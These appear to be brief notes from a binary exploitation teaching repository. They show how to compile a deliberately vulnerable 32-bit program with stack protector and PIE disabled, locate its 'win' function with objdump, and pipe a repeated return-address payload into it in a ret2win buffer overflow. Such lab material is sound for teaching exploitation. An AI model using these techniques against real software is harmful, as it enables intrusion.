Materials, notes, and talks about binary exploitation & RE
apt install libc6-dev-i386
gcc -m32 -fno-stack-protector -fno-PIC -no-pie -o jtr jtr.c
jtr.key
jtr_walkthrough.md
jtr_walkthrough_short.md
objdump -t jtr | grep win
0804849b g F .text 00000019 win
9b840408
python -c 'print("\x9b\x84\x04\x08" * 100)'
python -c 'print("\x9b\x84\x04\x08" * 100)' | ./jtr